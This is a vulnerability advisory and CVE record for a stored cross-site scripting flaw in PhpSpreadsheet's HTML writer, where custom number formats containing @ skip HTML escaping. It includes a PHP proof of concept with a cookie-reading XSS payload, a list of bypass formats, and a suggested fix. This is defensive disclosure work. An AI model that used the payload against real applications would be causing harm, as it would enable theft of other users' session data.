PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. The HTML writer skips htmlspecialchars escaping when a cell's formatted value differs from the original value. When a cell has a custom number format containing the text placeholder @ along with any additional literal characters (for example ". @", "@ ", or "x@"), the formatter replaces @ with the cell value and adds the extra characters, causing the formatted value to differ from the original and bypassing HTML escaping entirely. An attacker who can control the cell value and number format of an uploaded spreadsheet that is later converted to HTML and displayed to other users can achieve stored cross-site scripting. This issue is fixed in versions 5.7.0, 3.10.5, 2.4.5, 2.1.16, and 1.30.4.
PhpSpreadsheet vulnerable to XSS in HTML writer via custom number format codes
Problem type
Affected products
PHPOffice
>= 4.0.0, <= 5.6.0 - AFFECTED
>= 3.3.0, <= 3.10.4 - AFFECTED
>= 2.2.0, <= 2.4.4 - AFFECTED
>= 2.0.0, <= 2.1.15 - AFFECTED
<= 1.30.3 - AFFECTED
References
GitHub Security Advisories
GHSA-hrmw-qprp-wgmc
PhpSpreadsheet has XSS via number format code with @ text placeholder bypasses htmlspecialchars in HTML writer
https://github.com/advisories/GHSA-hrmw-qprp-wgmcIt was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes.
The Problem
In Writer/Html.php around line 1592, the code checks if the formatted cell data equals the original data to decide whether to apply htmlspecialchars():
if ($cellData === $origData) {
$cellData = htmlspecialchars($cellData, ...);
}
When a cell has a custom number format containing @ (text placeholder) with any additional literal characters, the formatter replaces @ with the cell value and adds the extra characters. This makes $cellData !== $origData, so htmlspecialchars() is skipped entirely.
Even a single trailing space in the format (@ ) is enough to bypass the escape.
Proof of Concept
use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Writer\Html;
use PhpOffice\PhpSpreadsheet\Cell\DataType;
$spreadsheet = new Spreadsheet();
$sheet = $spreadsheet->getActiveSheet();
// XSS payload with malicious number format
$sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING);
$sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @');
$writer = new Html($spreadsheet);
$writer->save('output.html');
The generated HTML contains:
<td>. <img src=x onerror=alert(document.cookie)></td>
The XSS payload is completely unescaped.
Tested Bypass Formats
General (default)
Original value
YES (safe)
. @
. + value
NO (XSS!)
@ (trailing space)
value +
NO (XSS!)
x@
x + value
NO (XSS!)
This was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser.
Impact
Any application that:
- Accepts uploaded XLSX files from users
- Converts them to HTML using PhpSpreadsheet's HTML writer
- Displays the HTML to other users
...is vulnerable to stored XSS. The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file's xl/styles.xml.
Suggested Fix
Always apply htmlspecialchars() regardless of whether formatting changed the value:
// Instead of conditional escaping:
$cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
Or escape AFTER formatting, not conditionally based on equality.
Reporter
Keyvan Hardani
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-40296Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-40296",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-05-06T20:48:34.504Z",
"dateReserved": "2026-04-10T20:22:44.035Z",
"datePublished": "2026-05-06T20:48:34.504Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-05-06T20:48:34.504Z"
},
"title": "PhpSpreadsheet vulnerable to XSS in HTML writer via custom number format codes",
"descriptions": [
{
"lang": "en",
"value": "PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. The HTML writer skips htmlspecialchars escaping when a cell's formatted value differs from the original value. When a cell has a custom number format containing the text placeholder @ along with any additional literal characters (for example \". @\", \"@ \", or \"x@\"), the formatter replaces @ with the cell value and adds the extra characters, causing the formatted value to differ from the original and bypassing HTML escaping entirely. An attacker who can control the cell value and number format of an uploaded spreadsheet that is later converted to HTML and displayed to other users can achieve stored cross-site scripting. This issue is fixed in versions 5.7.0, 3.10.5, 2.4.5, 2.1.16, and 1.30.4."
}
],
"affected": [
{
"vendor": "PHPOffice",
"product": "PhpSpreadsheet",
"versions": [
{
"version": ">= 4.0.0, <= 5.6.0",
"status": "affected"
},
{
"version": ">= 3.3.0, <= 3.10.4",
"status": "affected"
},
{
"version": ">= 2.2.0, <= 2.4.4",
"status": "affected"
},
{
"version": ">= 2.0.0, <= 2.1.15",
"status": "affected"
},
{
"version": "<= 1.30.3",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')",
"cweId": "CWE-79",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hrmw-qprp-wgmc",
"name": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hrmw-qprp-wgmc",
"tags": [
"x_refsource_CONFIRM"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM"
}
}
]
}
}
}